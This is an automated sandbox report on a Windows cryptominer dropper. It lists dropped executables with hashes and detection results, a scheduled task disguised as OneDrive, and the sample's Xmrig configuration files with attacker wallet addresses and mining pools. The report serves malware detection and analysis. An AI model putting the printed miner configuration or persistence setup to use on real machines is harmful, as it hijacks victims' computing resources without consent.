Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.
VT rate limit hit for: K4gsPJGEi4.exe

Simulations

Behavior and APIs

Time	Type	Description
12:09:04	API Interceptor	9x Sleep call for process: WMIC.exe modified
18:09:35	Task Scheduler	Run new task: OneDrv path: "C:\Users\user\AppData\Local\OneDrive\fontdrvhots.exe"

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
auth11.aeroadmin.com	view.exe	Get hash	malicious	Xmrig	Browse	37.48.87.53
auto.c3pool.org	x00zm3KVwb.exe	Get hash	malicious	Xmrig	Browse	88.198.117.174
	4xHN38uqxB.exe	Get hash	malicious	DoublePulsar, ETERNALBLUE, Xmrig	Browse	5.161.70.189
	UO2z4n1Sxx.exe	Get hash	malicious	Unknown	Browse	88.198.117.174
	4xHN38uqxB.exe	Get hash	malicious	Xmrig	Browse	88.198.117.174
	c3p.exe	Get hash	malicious	Xmrig	Browse	88.198.117.174
	SecuriteInfo.com.FileRepMalware.25283.7828.exe	Get hash	malicious	BlackMoon	Browse	5.161.70.189
	pg_ctlk.exe	Get hash	malicious	Xmrig	Browse	188.34.196.123
	logor.elf	Get hash	malicious	Xmrig	Browse	5.161.70.189
	qk6CviFPOs.exe	Get hash	malicious	Xmrig	Browse	5.161.70.189
	http://198.255.70.77:19490/spread.txt	Get hash	malicious	ETERNALBLUE	Browse	5.161.50.27

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\screen.exe	3M5zLUqPrc.bat	Get hash	malicious	Quasar	Browse
	Uni.bat	Get hash	malicious	Quasar	Browse
	Uni.bat	Get hash	malicious	Quasar	Browse
	BRIXN3tYRY.exe	Get hash	malicious	Unknown	Browse
	KMSpico.bat	Get hash	malicious	Quasar	Browse
	Tb5ydKLe0P.exe	Get hash	malicious	Remcos	Browse
	kJoDqmpElg.exe	Get hash	malicious	Remcos	Browse
	setup.exe	Get hash	malicious	RedLine	Browse
	9SNCHbNBia.exe	Get hash	malicious	Babadeda, Meterpreter	Browse
	Tyrant.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\IntelSvc.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3241944
Entropy (8bit):	6.300666139752175
Encrypted:	false
SSDEEP:	49152:RyBkRdnKQlYeEesgIMIbVSRsyMwJwTStnkoxCnKgyNOnJR:WkAe+Vm2wnndeKg5
MD5:	A7CDE18F991E97037A7899B7669E2548
SHA1:	0FD0B96FF150A1ECF93206C227A13148933F28CE
SHA-256:	8B9F1FA5F941C7F46B65BF8929CA80D132435151E1DCB3A5DE7693B70B254467
SHA-512:	1D73B9A3B8866AB9CCAC32BB97A63062D2A8C5152D83E5681EF1227B2DAB1D56CCC4D4FDB05C5FBA55A4CB27DE77592A509E1211D05F2F1811E19FDFA88FED50
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$....................Q.......Q...K...Q.........g....{;$....................b...........`......p...........w.......w.......t....w......Rich...........................PE..L...z..a.................P...X...............`....@...........................4......42...@...................................#.......1..C............/..1...P3.<...@6!.T...................87!......6!.@............`...............................text....O.......P.................. ..`.rdata..\....`.......T..............@..@.data...t.....#.......#.............@....rsrc....C....1..D...x-.............@..@.reloc..<....P3......./.............@..B........................................................................................................................................................................................................................................................

C:\ProgramData\cmdow.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	88576
Entropy (8bit):	6.15492829325332
Encrypted:	false
SSDEEP:	1536:ufVX5SG8cD++OTJ5enxjSiXkSxf5DqWtp0XU1jDBBrjK8o3agdbx583+fs7k+nUI:O5SG7S6/7k+nUwoL1xii2l8NXQUQUlC
MD5:	DDD12566B99343B96609AFA2524ECEC3
SHA1:	8FEF2C2BC87EF7D135296FDB4CF9ECD9C0322D55
SHA-256:	767B877E735C425BF05C34683356ABFDE4070B092F17A4741EA5AC490611F3DE
SHA-512:	B11A36B25B5C34CD86C367C4003F76F360965FDBC67CA1F30AFEC3A744D419C03D70ADE2423AD6A1D2858561F732DB9F1D1A279A37B045F8A5FAA9C53DBE30BD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....T.....................V...N................@.................................z......... .....................................................................................................................T................................text...<...........................`.P`.data...\...........................@.`..rdata..`V.......X..................@.`@.eh_fram.....p.......D..............@.0@.bss....tL............................`..idata...............H..............@.0..CRT.................V..............@.0..tls.... ............X..............@.0.................................................................................................................................................................................................................................................................................................................

C:\ProgramData\screen.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	45568
Entropy (8bit):	7.750275657742685
Encrypted:	false
SSDEEP:	768:UDR7drWxRrYJAgERvFAREX5DyzaccyOkVDIBF9K/phcanwUaajMIWCW2jsV:2A3cJAgmSRC5DcLxIBLGwUgIW2sV
MD5:	A1CD6A64E8F8AD5D4B6C07DC4113C7EC
SHA1:	60E2F48A51C061BBA72A08F34BE781354F87AA49
SHA-256:	B994AE5CBFB5AD308656E9A8BF7A4A866FDEB9E23699F89F048D7F92E6BB8577
SHA-512:	87A42901A63793653D49F1C6D410A429CABB470B4C340C4553CBD9ECCACB38D8543F85455465E0A432D737E950C590175DAD744094861F7C3E575446A65B41E8
Malicious:	false
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 12%
Joe Sandbox View:	Filename: 3M5zLUqPrc.bat, Detection: malicious, Browse Filename: Uni.bat, Detection: malicious, Browse Filename: Uni.bat, Detection: malicious, Browse Filename: BRIXN3tYRY.exe, Detection: malicious, Browse Filename: KMSpico.bat, Detection: malicious, Browse Filename: Tb5ydKLe0P.exe, Detection: malicious, Browse Filename: kJoDqmpElg.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse Filename: 9SNCHbNBia.exe, Detection: malicious, Browse Filename: Tyrant.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W...W...W..=X..W...t...W..$t...W...t...W..=X..W...W...V.....W......W......W..Rich.W..........................PE..L...-'C].........................................@.................................................................................................................................................................................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....

C:\Users\Public\IntelSvc.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3241944
Entropy (8bit):	6.300666139752175
Encrypted:	false
SSDEEP:	49152:RyBkRdnKQlYeEesgIMIbVSRsyMwJwTStnkoxCnKgyNOnJR:WkAe+Vm2wnndeKg5
MD5:	A7CDE18F991E97037A7899B7669E2548
SHA1:	0FD0B96FF150A1ECF93206C227A13148933F28CE
SHA-256:	8B9F1FA5F941C7F46B65BF8929CA80D132435151E1DCB3A5DE7693B70B254467
SHA-512:	1D73B9A3B8866AB9CCAC32BB97A63062D2A8C5152D83E5681EF1227B2DAB1D56CCC4D4FDB05C5FBA55A4CB27DE77592A509E1211D05F2F1811E19FDFA88FED50
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$....................Q.......Q...K...Q.........g....{;$....................b...........`......p...........w.......w.......t....w......Rich...........................PE..L...z..a.................P...X...............`....@...........................4......42...@...................................#.......1..C............/..1...P3.<...@6!.T...................87!......6!.@............`...............................text....O.......P.................. ..`.rdata..\....`.......T..............@..@.data...t.....#.......#.............@....rsrc....C....1..D...x-.............@..@.reloc..<....P3......./.............@..B........................................................................................................................................................................................................................................................

C:\Users\Public\RtkAudio.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	8331776
Entropy (8bit):	6.602098080859404
Encrypted:	false
SSDEEP:	98304:C+U9oUzsxBTVgMY9Sh+a+XkHzrkg8wBYzS0XMqdazDU1Cf1bkUTktjT1/TW2L8mh:DVBTTT/Y7Te1LWZH7lDsnNk1ws
MD5:	A6D4706BAEB9AB97490D745F7A2BB11E
SHA1:	A5C96F75D41F1CA22B5B4F66DA15595341AA2EF2
SHA-256:	96D24D557AB0BA58EE36350D2D0EDFDA6EE0E29515C254870789D1CCD6A5CE00
SHA-512:	5D982A8C2F85E9C66E361E659B98891A37009179931DAE06BA0A455A49D1D9FBF4F9FEF93092C320989B09D9D613E48F1453CCEADCD772B6A750F15305AF48AB
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\Public\RtkAudio.exe, Author: Joe Security Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: C:\Users\Public\RtkAudio.exe, Author: unknown Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Users\Public\RtkAudio.exe, Author: unknown Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\Public\RtkAudio.exe, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\Public\RtkAudio.exe, Author: ditekSHen Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\Public\RtkAudio.exe, Author: Joe Security Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: C:\Users\Public\RtkAudio.exe, Author: unknown Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Users\Public\RtkAudio.exe, Author: unknown Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\Public\RtkAudio.exe, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\Public\RtkAudio.exe, Author: ditekSHen Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\Public\RtkAudio.exe, Author: Joe Security Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: C:\Users\Public\RtkAudio.exe, Author: unknown Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Users\Public\RtkAudio.exe, Author: unknown Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\Public\RtkAudio.exe, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\Public\RtkAudio.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....i.b...............&..^.......2............@.....................................T....`... ..............................................p...F.....S.....u................p...........................`.s.(.......................8............................text.....^.......^.................`..`.data... .....^.......^.............@....rdata..P....._......._.............@..@.pdata........u.......u.............@..@.xdata..@.....x.......x.............@..@.bss.... .2..`\|..........................idata...F...p...H...B\|.............@....CRT....h.............\|.............@....tls.................\|.............@....rsrc...S............\|.............@....reloc..p............~.............@..B........................................................................................................................................................................

C:\Users\Public\WinRing0x64.sys

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Users\Public\cmdow.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	88576
Entropy (8bit):	6.15492829325332
Encrypted:	false
SSDEEP:	1536:ufVX5SG8cD++OTJ5enxjSiXkSxf5DqWtp0XU1jDBBrjK8o3agdbx583+fs7k+nUI:O5SG7S6/7k+nUwoL1xii2l8NXQUQUlC
MD5:	DDD12566B99343B96609AFA2524ECEC3
SHA1:	8FEF2C2BC87EF7D135296FDB4CF9ECD9C0322D55
SHA-256:	767B877E735C425BF05C34683356ABFDE4070B092F17A4741EA5AC490611F3DE
SHA-512:	B11A36B25B5C34CD86C367C4003F76F360965FDBC67CA1F30AFEC3A744D419C03D70ADE2423AD6A1D2858561F732DB9F1D1A279A37B045F8A5FAA9C53DBE30BD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....T.....................V...N................@.................................z......... .....................................................................................................................T................................text...<...........................`.P`.data...\...........................@.`..rdata..`V.......X..................@.`@.eh_fram.....p.......D..............@.0@.bss....tL............................`..idata...............H..............@.0..CRT.................V..............@.0..tls.... ............X..............@.0.................................................................................................................................................................................................................................................................................................................

C:\Users\Public\config.ini

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	264
Entropy (8bit):	5.579378925177609
Encrypted:	false
SSDEEP:	6:e5odPXvqzm8giMafKn71g7pqfAWFZLabXx1EXYfFROMfoIj:Yo9i6x7ao71g7plWPazAYEMTj
MD5:	B01A9D0151625441C4FC500F2E227439
SHA1:	0F2EC5AC6C9CFE12161512FC237E39335A82BF99
SHA-256:	3EE3ED71F81D848BF7978E0137F475D670EC59596870B0FFE0C6D8FC397B48D0
SHA-512:	A91635B587128EDBBFE1BF65E1AF3E66AA19E422BF00FCF78175756EC82022C61AB12E2AE484C2D1389CFA1CB5915EA3D1DB73242BD7D14E74BD917B49F60D96
Malicious:	false
Preview:	[RandomX]..wallet = 84xqDGx3bA2NjVyZ5vC3dG5ivgAd5wFxjMXEGV6BuxV8EkPLvqERcSMGXBkwQptbUTA8goW42GCUK4EYaB8z6gXoEmkBPeH.975775562_T..pool1 = auto.c3pool.org:13333..pool2 = auto.c3pool.org:443..pool3 = xmr.2miners.com:2222..pool4 = xmr.GHhA5Joo.com:2222..noLog = true..

C:\Users\Public\config.json

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	938
Entropy (8bit):	5.57285235961628
Encrypted:	false
SSDEEP:	24:hDbdmeOM6p75x2iSkel575T96x7J7q7bel57536x7J7q7be9:ZhU1V5xvsP5x6BJ7q7CP536BJ7q7C9
MD5:	73D059C6788D35FBF1CDC6ABD799DF52
SHA1:	A6AF58E1C8EFCACC1A053E6BEA819067ACC0C8C4
SHA-256:	C90CA39AE1993D6171792AE37D19768B887DB22D3912650F7E5FB938537FC77D
SHA-512:	EE6057A92328E756599DFAF998081B88F56EDF486C8ADBB5EA8F7DA8B718693D502314C2260F9B1FDC7196F2033DDE7C30ABF06BAD8AB1F45655DF2599DFC9CD
Malicious:	false
Preview:	{.."autosave": true,.."background": true,.."title": true,.."cpu": true,.."opencl": false,.."cuda": false,.."retries": 1,.."retry-pause": 2,.."pools": [..{.."algo": "rx/0",.."coin": "XMR",.."url": "auto.c3pool.org:13333",.."user": "8Bg9mc5vUWw8dL8jCxbVda9ukMHxpisqmfCaaUDbngS8jGRS7cuRu1HC6m2dEKZW7yBpDQ3fRQtFShEDXTSbQ9pf5Tk2Sut.975775562_T",.."pass": "x",.."tls": false,.."keepalive": true,.."nicehash": false..},..{.."algo": "rx/0",.."coin": "XMR",.."url": "auto.c3pool.org:443",.."user": "84xqDGx3bA2NjVyZ5vC3dG5ivgAd5wFxjMXEGV6BuxV8EkPLvqERcSMGXBkwQptbUTA8goW42GCUK4EYaB8z6gXoEmkBPeH.975775562_T",.."pass": "x",.."tls": false,.."keepalive": true,.."nicehash": false..},..{.."algo": "rx/0",.."coin": "XMR",.."url": "xmr.2miners.com:2222",.."user": "84xqDGx3bA2NjVyZ5vC3dG5ivgAd5wFxjMXEGV6BuxV8EkPLvqERcSMGXBkwQptbUTA8goW42GCUK4EYaB8z6gXoEmkBPeH.975775562_T",.."pass": "x",.."tls": false,.."keepalive": true,.."nicehash": false..}..]..}..

C:\Users\Public\screen.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	45568
Entropy (8bit):	7.750275657742685
Encrypted:	false
SSDEEP:	768:UDR7drWxRrYJAgERvFAREX5DyzaccyOkVDIBF9K/phcanwUaajMIWCW2jsV:2A3cJAgmSRC5DcLxIBLGwUgIW2sV
MD5:	A1CD6A64E8F8AD5D4B6C07DC4113C7EC
SHA1:	60E2F48A51C061BBA72A08F34BE781354F87AA49
SHA-256:	B994AE5CBFB5AD308656E9A8BF7A4A866FDEB9E23699F89F048D7F92E6BB8577
SHA-512:	87A42901A63793653D49F1C6D410A429CABB470B4C340C4553CBD9ECCACB38D8543F85455465E0A432D737E950C590175DAD744094861F7C3E575446A65B41E8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W...W...W..=X..W...t...W..$t...W...t...W..=X..W...W...V.....W......W......W..Rich.W..........................PE..L...-'C].........................................@.................................................................................................................................................................................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....

C:\Users\user\AppData\Local\OneDrive\fontdrvhots.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3241944
Entropy (8bit):	6.300666139752175
Encrypted:	false
SSDEEP:	49152:RyBkRdnKQlYeEesgIMIbVSRsyMwJwTStnkoxCnKgyNOnJR:WkAe+Vm2wnndeKg5
MD5:	A7CDE18F991E97037A7899B7669E2548
SHA1:	0FD0B96FF150A1ECF93206C227A13148933F28CE
SHA-256:	8B9F1FA5F941C7F46B65BF8929CA80D132435151E1DCB3A5DE7693B70B254467
SHA-512:	1D73B9A3B8866AB9CCAC32BB97A63062D2A8C5152D83E5681EF1227B2DAB1D56CCC4D4FDB05C5FBA55A4CB27DE77592A509E1211D05F2F1811E19FDFA88FED50
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$....................Q.......Q...K...Q.........g....{;$....................b...........`......p...........w.......w.......t....w......Rich...........................PE..L...z..a.................P...X...............`....@...........................4......42...@...................................#.......1..C............/..1...P3.<...@6!.T...................87!......6!.@............`...............................text....O.......P.................. ..`.rdata..\....`.......T..............@..@.data...t.....#.......#.............@....rsrc....C....1..D...x-.............@..@.reloc..<....P3......./.............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IntelSvc.exe

Download File

Process:	C:\Users\user\Desktop\K4gsPJGEi4.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3241944
Entropy (8bit):	6.300666139752175
Encrypted:	false
SSDEEP:	49152:RyBkRdnKQlYeEesgIMIbVSRsyMwJwTStnkoxCnKgyNOnJR:WkAe+Vm2wnndeKg5
MD5:	A7CDE18F991E97037A7899B7669E2548
SHA1:	0FD0B96FF150A1ECF93206C227A13148933F28CE
SHA-256:	8B9F1FA5F941C7F46B65BF8929CA80D132435151E1DCB3A5DE7693B70B254467
SHA-512:	1D73B9A3B8866AB9CCAC32BB97A63062D2A8C5152D83E5681EF1227B2DAB1D56CCC4D4FDB05C5FBA55A4CB27DE77592A509E1211D05F2F1811E19FDFA88FED50
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$....................Q.......Q...K...Q.........g....{;$....................b...........`......p...........w.......w.......t....w......Rich...........................PE..L...z..a.................P...X...............`....@...........................4......42...@...................................#.......1..C............/..1...P3.<...@6!.T...................87!......6!.@............`...............................text....O.......P.................. ..`.rdata..\....`.......T..............@..@.data...t.....#.......#.............@....rsrc....C....1..D...x-.............@..@.reloc..<....P3......./.............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\PathView.txt

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	37
Entropy (8bit):	4.15487093296263
Encrypted:	false
SSDEEP:	3:oNUkh4E2J5xAIm:oN923fm
MD5:	2A24ED88EC4A21FE3D87106433EE06FF
SHA1:	C7EE67A293182EFFD0BBE583B3A484F9BEAB20BC
SHA-256:	6D4E7882C1D8F228E75440CA4A1CF0D2A2355E9FBB174B79180E0C76E5E00A4D
SHA-512:	BD48E20A04793B617C9C7873B96E23E7C83903F6E8524D204FB2DB81A82312590787FAD0394F21C4C288E7CC4C091C9D9E7A4D0543B2937D1725DA13D924B028
Malicious:	false
Preview:	C:\Users\user\AppData\Local\Temp\..

C:\Users\user\AppData\Local\Temp\PathView1.txt

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	37
Entropy (8bit):	4.15487093296263
Encrypted:	false
SSDEEP:	3:oNUkh4E2J5xAIm:oN923fm
MD5:	2A24ED88EC4A21FE3D87106433EE06FF
SHA1:	C7EE67A293182EFFD0BBE583B3A484F9BEAB20BC
SHA-256:	6D4E7882C1D8F228E75440CA4A1CF0D2A2355E9FBB174B79180E0C76E5E00A4D
SHA-512:	BD48E20A04793B617C9C7873B96E23E7C83903F6E8524D204FB2DB81A82312590787FAD0394F21C4C288E7CC4C091C9D9E7A4D0543B2937D1725DA13D924B028
Malicious:	false
Preview:	C:\Users\user\AppData\Local\Temp\..

C:\Users\user\AppData\Local\Temp\RtkAudio.exe

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	8331776
Entropy (8bit):	6.602098080859404
Encrypted:	false
SSDEEP:	98304:C+U9oUzsxBTVgMY9Sh+a+XkHzrkg8wBYzS0XMqdazDU1Cf1bkUTktjT1/TW2L8mh:DVBTTT/Y7Te1LWZH7lDsnNk1ws
MD5:	A6D4706BAEB9AB97490D745F7A2BB11E
SHA1:	A5C96F75D41F1CA22B5B4F66DA15595341AA2EF2
SHA-256:	96D24D557AB0BA58EE36350D2D0EDFDA6EE0E29515C254870789D1CCD6A5CE00
SHA-512:	5D982A8C2F85E9C66E361E659B98891A37009179931DAE06BA0A455A49D1D9FBF4F9FEF93092C320989B09D9D613E48F1453CCEADCD772B6A750F15305AF48AB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....i.b...............&..^.......2............@.....................................T....`... ..............................................p...F.....S.....u................p...........................`.s.(.......................8............................text.....^.......^.................`..`.data... .....^.......^.............@....rdata..P....._......._.............@..@.pdata........u.......u.............@..@.xdata..@.....x.......x.............@..@.bss.... .2..`\|..........................idata...F...p...H...B\|.............@....CRT....h.............\|.............@....tls.................\|.............@....rsrc...S............\|.............@....reloc..p............~.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RtkAudio.txt

Download File

Process:	C:\Users\user\Desktop\K4gsPJGEi4.exe
File Type:	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	8331776
Entropy (8bit):	6.602098080859404
Encrypted:	false
SSDEEP:	98304:C+U9oUzsxBTVgMY9Sh+a+XkHzrkg8wBYzS0XMqdazDU1Cf1bkUTktjT1/TW2L8mh:DVBTTT/Y7Te1LWZH7lDsnNk1ws
MD5:	A6D4706BAEB9AB97490D745F7A2BB11E
SHA1:	A5C96F75D41F1CA22B5B4F66DA15595341AA2EF2
SHA-256:	96D24D557AB0BA58EE36350D2D0EDFDA6EE0E29515C254870789D1CCD6A5CE00
SHA-512:	5D982A8C2F85E9C66E361E659B98891A37009179931DAE06BA0A455A49D1D9FBF4F9FEF93092C320989B09D9D613E48F1453CCEADCD772B6A750F15305AF48AB
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, Author: Joe Security Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, Author: unknown Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, Author: unknown Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....i.b...............&..^.......2............@.....................................T....`... ..............................................p...F.....S.....u................p...........................`.s.(.......................8............................text.....^.......^.................`..`.data... .....^.......^.............@....rdata..P....._......._.............@..@.pdata........u.......u.............@..@.xdata..@.....x.......x.............@..@.bss.... .2..`\|..........................idata...F...p...H...B\|.............@....CRT....h.............\|.............@....tls.................\|.............@....rsrc...S............\|.............@....reloc..p............~.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe

Download File

Process:	C:\Users\user\Desktop\K4gsPJGEi4.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	392704
Entropy (8bit):	4.965701476357038
Encrypted:	false
SSDEEP:	6144:ZBULviqYnI3QA7JTXRnZSHL2GZbkG/TZgLgscSzNB:9qBlG/TZgUsjzNB
MD5:	AC27DE51896A5BA2FD0DDA9B7955A201
SHA1:	864A95DEF336B50C70300FF6A7C553F0095A535A
SHA-256:	35D3F6C87CC33F2FDA5B594A6990D8D14E085E313564127A9C0606CEDB398F93
SHA-512:	CD25F4BDC8E6DD845F5C836F50259E2E2C291D99B37071F30007FA13EDEB2D8C82880BF9EEFDB363309C9128F78C7E451954B98ABEFA039EA12E33548771D625
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6.Y.W...W...W....1..W....'..W.......W...W..<W.... ..W....0..W....5..W..Rich.W..................PE..L....@.T.....................<......S>............@..........................@..............................................d........`..n...............................................................@...............H............................text............................... ..`.rdata...I.......J..................@..@.data....0... ......................@....rsrc...n....`....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Start.cmd

Download File

Process:	C:\Users\user\Desktop\K4gsPJGEi4.exe
File Type:	DOS batch file, ASCII text, with very long lines (363), with CRLF line terminators
Category:	dropped
Size (bytes):	120766
Entropy (8bit):	5.695506171656063
Encrypted:	false
